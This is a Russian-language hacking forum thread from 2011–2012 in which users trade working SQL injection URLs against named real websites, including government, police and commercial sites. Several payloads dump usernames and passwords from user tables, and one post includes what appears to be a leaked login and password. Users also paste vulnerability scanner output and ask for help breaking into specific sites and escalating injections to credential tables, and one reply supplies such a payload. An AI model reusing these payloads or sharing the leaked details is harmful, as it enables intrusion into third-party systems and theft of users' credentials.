RE: Ваши Sql-инъекции
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Ваши Sql-инъекции - 2011-10-12 00:06:30.413333
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.cathedralhillpress.com/book.php?id=-1+Union+select+1,2,Version%28%29,4,5,6,7,8,9,10,11,12,13,14,15--
|
|
|
RE: Ваши Sql-инъекции - 2011-10-14 21:39:26.350000
|
|
|
GoAttack
Сообщений: 842
Оценки: 189
Присоединился: 2009-05-08 23:20:55.580000
|
http://bbyloosediamonds.com/pages.php?id=-1+union+select+1,@@version,3,4,5,6,7,8,9
1:byehuda:Y_dia2011
|
|
|
RE: Ваши Sql-инъекции - 2011-10-20 13:56:24.300000
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.bcspeakers.com/product.php?id=-1+union+select+1,group_concat(id_user,0x3a,username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+_user
|
|
|
RE: Ваши Sql-инъекции - 2011-10-25 23:40:16.506666
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://pojuca.ba.gov.br/conteudo/departamento_miolo.php?id=-21+union+select+1,version(),database(),4,5--
|
|
|
RE: Ваши Sql-инъекции - 2011-10-26 01:10:56.843333
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.thatquailplace.com/articles/index.php?id=-7+union+select+1,2,version(),4,5,6,7,8,9,10,11--
|
|
|
RE: Ваши Sql-инъекции - 2011-10-26 01:13:12.393333
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.thatquailplace.com/articles/index.php?id=-7+union+select+1,2,version(),4,5,6,7,8,9,10,11--
|
|
|
RE: Ваши Sql-инъекции - 2011-11-05 23:49:45.233333
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.fondkadyrova.com/file.php?razd=1&id=-4+union+select+1,version(),3,4--
|
|
|
RE: Ваши Sql-инъекции - 2011-11-07 21:53:27.523333
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.soleatlanta.com/pressmedia-detail.asp?REC_ID=-4+union+select+1,2,3,4,5,6,7-- http://pastebin.com/yhDV756Z
|
|
|
RE: Ваши Sql-инъекции - 2011-11-08 00:43:33.126666
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.nypdangels.com/cop/cop.php?id=-374+order+by+9– http://pastebin.com/tunsbxbt
|
|
|
RE: Ваши Sql-инъекции - 2011-11-08 01:48:35.196666
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://darjeelingpolice.org/stolen_vehicle_view.php?ID=-130+union+select+1,2,3,4,version(),6,database(),8,user(),10,11,12,13,14,15,16,17,18,19,20,21--
http://www.dorset.polfed.org/news_article.php?id=-000427+union+select+1,2,database(),4,version(),6,7--
|
|
|
RE: Ваши Sql-инъекции - 2011-11-21 18:17:20.770000
|
|
|
Сaptain T0ma5o
Сообщений: 66
Оценки: 0
Присоединился: 2011-10-21 10:42:18.486666
|
http://www.aenbi.ru/index.php?pid=-42+union+select+1,2,version(),4–+
|
|
|
RE: Ваши Sql-инъекции - 2011-12-14 17:36:20.300000
|
|
|
slawyanin
Сообщений: 8
Оценки: 0
Присоединился: 2011-11-14 16:01:17.530000
|
ПОМОГИТЕ ПРАВИЛЬНО СФОРМИРОВАТЬ ЗАПРОС ЧТОБЫ УЗНАТЬ ПАССЫ ЮЗВЕРОВ ВОТ ИНФА О САЙТЕ Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Extracted Version: X-Powered-By: PHP/5.2.14 Vulnerable URL : http://www.ccылкунедам.com/forgot.php Parameter Name: Email <========== Parameter Type: Post <========== Attack Pattern: '%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B' Vulnerable URL : http://www.ccылкунедам.com/forgot.php Identified Internal Path(s): /home/tnburns/public_html/ccылкунедам.com/forgot.php Parameter Name: Email <================== Parameter Type: Post Attack Pattern: '%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B' Vulnerable URL : http://www.ccылкунедам.com/forgot.php Parameter Name: Email <========= Parameter Type: Post Attack Pattern: '%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B' Vulnerable URL : http://www.ccылкунедам.com/forgot.php Parameter Name: Email <———- Parameter Type: Post <——— Attack Pattern: ' OR 'ns'='ns <— Vulnerable URL : http://www.ccылкунедам.com/members.php Identified Field Name: password <—- Vulnerable URL : http://www.ccылкунедам.com/members.php Form target action: members.php <—– Vulnerable URL : http://www.ccылкунедам.com/members.php Identified Internal Path(s): /home/tnburns/public_html/ccылкунедам.com/members.php Parameter Name: id <—– Parameter Type: Post <—– Attack Pattern: 1%27+or+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)–+1 Vulnerable URL : http://www.ccылкунедам.com/ Identified Cookie: PHPSESSID Vulnerable URL : http://www.ccылкунедам.com/Scripts/'"–><script>netsparker(0x00003B)</script> Parameter Name: URI-BASED <—– Parameter Type: RawUrlInjection <====== Attack Pattern: '"–><script>netsparker(0x00003B)</script> НА ПРИМЕРЕ ЭТОЙ ССЫЛКИ: http://www.site.com/forgot.php?Email=default
|
|
|
RE: Ваши Sql-инъекции - 2011-12-17 14:35:25.296666
|
|
|
headsucker
Сообщений: 1304
Оценки: 10
Присоединился: 2011-02-09 15:30:26.450000
|
del pls
|
|
|
RE: Ваши Sql-инъекции - 2012-01-26 03:44:46.423333
|
|
|
Mazay.off
Сообщений: 89
Оценки: 0
Присоединился: 2011-10-25 21:39:45.356666
|
http://ocenshik.mostpp.ru/news.php?id=1%20%26%26%201%3D2%20UNION%20SELECT%201%2C2%2C3%2C4%2CCONCAT%280x6467797436%2CCONCAT_WS%280x203A20%2CVERSION%28%29%2CDATABASE%28%29%2CUSER%28%29%29%2C0x3566646B68%29%2C6%2C7%2C8%20%23 VERSION: 4.0.27 DATABASE: ocenshik USER: root@zvm27.host.ru
|
|
|
RE: Ваши Sql-инъекции - 2012-01-27 18:33:45.603333
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
quote:
ORIGINAL: Mazay.off http://ocenshik.mostpp.ru/news.php?id=1%20%26%26%201%3D2%20UNION%20SELECT%201%2C2%2C3%2C4%2CCONCAT%280x6467797436%2CCONCAT_WS%280x203A20%2CVERSION%28%29%2CDATABASE%28%29%2CUSER%28%29%29%2C0x3566646B68%29%2C6%2C7%2C8%20%23 VERSION: 4.0.27 DATABASE: ocenshik USER: root@zvm27.host.ru баян .смотри сюда —–> http://forum.antichat.ru/showthread.php?p=1988791 пост 11572 и проверять здесь——>>> http://forum.antichat.ru/threadnav21336-1-10.html 1 пост
|
|
|
RE: Ваши Sql-инъекции - 2012-01-27 18:48:54.293333
|
|
|
Watcover3396
Сообщений: 22
Оценки: 0
Присоединился: 2011-08-10 17:55:55.606666
|
Помогите взломать сайт http://www.skyriver.ru/
|
|
|
RE: Ваши Sql-инъекции - 2012-01-27 20:13:39.706666
|
|
|
kravch_v
Сообщений: 1
Оценки: 0
Присоединился: 2012-01-27 20:10:06.030000
|
quote:
ORIGINAL: Watcover3396 Помогите взломать сайт http://www.skyriver.ru/ http://www.skyriver.ru/news.phtml?action=results&poll_ident=42' инъекция слепая, раскручивай сам.
|
|
|
RE: Ваши Sql-инъекции - 2012-02-03 17:39:03.603333
|
|
|
Mazay.off
Сообщений: 89
Оценки: 0
Присоединился: 2011-10-25 21:39:45.356666
|
quote:
баян .смотри сюда —–> http://forum.antichat.ru/showthread.php?p=1988791 пост 11572 и проверять здесь——>>> http://forum.antichat.ru/threadnav21336-1-10.html 1 пост 8| сорри… не виноват что мне попался именно этот сайт… прошу прощения
|
|
|
RE: Ваши Sql-инъекции - 2012-02-05 20:21:22.463333
|
|
|
Mouwa
Сообщений: 10
Оценки: 0
Присоединился: 2012-02-04 22:56:43.680000
|
Что нужно, когда получил что-то вроде zagred@localhost 9 zagred@localhost zagran lenny1 ????
|
|
|
RE: Ваши Sql-инъекции - 2012-02-05 20:27:40.626666
|
|
|
Mouwa
Сообщений: 10
Оценки: 0
Присоединился: 2012-02-04 22:56:43.680000
|
Что делать после того, как получил информацию user(),database(),version() ??
|
|
|
RE: Ваши Sql-инъекции - 2012-02-06 00:54:03.096666
|
|
|
Сaptain T0ma5o
Сообщений: 66
Оценки: 0
Присоединился: 2011-10-21 10:42:18.486666
|
Mouwa, вопрос по моему другой, что тебе от сайта надо) Вот сможешь на него корректно ответить и предыдущий вопрос отпадет
|
|
|
RE: Ваши Sql-инъекции - 2012-02-08 00:25:38.400000
|
|
|
Mouwa
Сообщений: 10
Оценки: 0
Присоединился: 2012-02-04 22:56:43.680000
|
Помогите найти уязвимость на webmasters.ru?
|
|
|
RE: Ваши Sql-инъекции - 2012-02-08 20:58:53.143333
|
|
|
fiesta14
Сообщений: 35
Оценки: 0
Присоединился: 2011-11-16 21:03:10.433333
|
Mouwa Думаю там нет уязвимостей !
|
|
|
RE: Ваши Sql-инъекции - 2012-02-13 06:37:57.250000
|
|
|
vivirna
Сообщений: 5
Оценки: 0
Присоединился: 2011-11-27 11:29:33.116666
|
Люди киньте сайты с какими-нибудь интересными случаями, желательно с комментариями! Заранее благодарю!
|
|
|
RE: Ваши Sql-инъекции - 2012-02-29 18:58:57.543333
|
|
|
Heitz
Сообщений: 84
Оценки: 0
Присоединился: 2012-02-27 23:54:14.600000
|
Target: http://sanitek.com.ua/?id=99999999 Host IP: 77.87.192.86 Web Server: nginx/0.6.32 Powered-by: PHP/5.2.6-1+lenny13 DB Server: MySQL >=5 Current User: u_sanitek@localhost Sql Version: 5.0.51a-24+lenny5 Current DB: sanitek System User: u_sanitek@localhost Data Bases: information_schema sanitek
|
|
|
RE: Ваши Sql-инъекции - 2012-03-22 23:56:17.133333
|
|
|
Almasik
Сообщений: 46
Оценки: 0
Присоединился: 2011-09-05 05:42:33.513333
|
http://www.bcspeakers.net/product.php?id=1'
|
|
|
RE: Ваши Sql-инъекции - 2012-03-23 00:01:25.740000
|
|
|
Almasik
Сообщений: 46
Оценки: 0
Присоединился: 2011-09-05 05:42:33.513333
|
http://mybread.mobi/glossary.php?Id=-1+union+select+1,concat_ws%280x3a,version%28%29,dat%20abase%28%29,user%28%29%29,3–+
|
|
|
RE: Ваши Sql-инъекции - 2012-03-23 00:02:49.650000
|
|
|
Almasik
Сообщений: 46
Оценки: 0
Присоединился: 2011-09-05 05:42:33.513333
|
http://www.glaucomajournal.ru/ раньше можно было тупо вставлять ковычку,щас пофиксили,нужен обход фильтрфцу431
|
|
|
RE: Ваши Sql-инъекции - 2012-04-14 15:15:27.416666
|
|
|
UDMYRT
Сообщений: 1
Оценки: 0
Присоединился: 2012-04-14 09:27:40.943333
|
http://sexxxinfo.ru/index.php?id=50113
|
|
|
RE: Ваши Sql-инъекции - 2012-04-19 16:52:34.146666
|
|
|
MicroXaker
Сообщений: 1772
Оценки: 45
Присоединился: 2010-11-08 16:42:18.190000
|
http://www.vorstu.ru/search/?sel_rubric[]=(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(78),CHAR(80),CHAR(51),CHAR(121),CHAR(109),CHAR(97),CHAR(105),CHAR(67)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))&text=1 Кто-нить, помогите её раскрутить до таблиц логин:пароль.
|
|
|
RE: Ваши Sql-инъекции - 2012-04-20 12:38:02.740000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
http://www.vorstu.ru/search/?sel_rubric[]=(select+1+and+row(1,1)%3E(select+count(*),concat(concat((select+concat(user_login,0x3a,user_password)+from+user+limit+0,1)),floor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&text=1
|
|
|
RE: Ваши Sql-инъекции - 2012-04-20 16:35:33.126666
|
|
|
MicroXaker
Сообщений: 1772
Оценки: 45
Присоединился: 2010-11-08 16:42:18.190000
|
Большое спасибо!
|
|
|
RE: Ваши Sql-инъекции - 2012-05-01 11:23:17.140000
|
|
|
Celldweller
Сообщений: 19
Оценки: 0
Присоединился: 2011-04-30 12:22:10.366666
|
Ребята, кто-нибудь знает, можно ли эту http://leaderproduction.ru/?p=3394 уязвимость дальше раскрутить .. Буду признателен!
|
|
|
RE: Ваши Sql-инъекции - 2012-05-01 11:51:11.940000
|
|
|
GothX
Сообщений: 263
Оценки: 20
Присоединился: 2011-06-22 13:27:08.173333
|
Нельзя)
|
|
|
|
|